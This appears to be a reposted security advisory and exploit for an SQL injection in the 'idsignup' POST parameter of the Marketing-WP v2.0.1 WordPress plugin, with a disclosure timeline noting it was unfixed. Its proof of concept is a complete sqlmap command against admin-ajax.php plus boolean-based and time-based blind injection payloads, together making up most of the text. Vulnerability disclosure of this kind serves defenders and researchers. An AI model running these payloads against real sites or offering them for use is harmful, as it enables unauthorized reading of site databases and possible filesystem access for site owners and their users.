WordPress Marketing-WP v2.0.1 Plugin SQL Injection Vulnerability

# Exploit Title: Marketing-WP v2.0.1 WordPress Plugin SQL Injection
# Exploit Author: TAD GROUP
# Vendor Homepage: http://marketing-wp.com/
# Software Link: https://wordpress.org/plugins/mwp-forms/
# Version: 2.0.1
# Contact: [email protected]
# Website: https://tad.bg <https://tad.bg>
# Category: Web Application Exploits

1. Description

An unescaped parameter was found in Marketing-WP v2.0.1 (WP plugin). An attacker can exploit this vulnerability to read from the database.
The POST parameter 'idsignup' is vulnerable.

2. Proof of concept

sqlmap -u  "http://example.com/wp-admin/admin-ajax.php" --data "action=mwp_signup_send&email=tad%40tad.tad&hvost=%3Fpage_id%3D69&idsignup=1" --dbs --threads=10 --random-agent

Parameter: idsignup (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=mwp_signup_send&[email protected]&hvost=?page_id=47&idsignup=1 AND 5272=5272

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: action=mwp_signup_send&[email protected]&hvost=?page_id=47&idsignup=1 AND (SELECT * FROM (SELECT(SLEEP(5)))hXXu)

3. Attack outcome:

An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.

4. Impact

Critical

5. Affected versions

<= 2.0.1

6. Disclosure timeline

16-Mar-2017 - found the vulnerability
16-Mar-2017 - informed the developer
31-Mar-2017 - release date of this security advisory

Not fixed at the date of submitting this exploit.

#  0day.today [2018-02-27]  #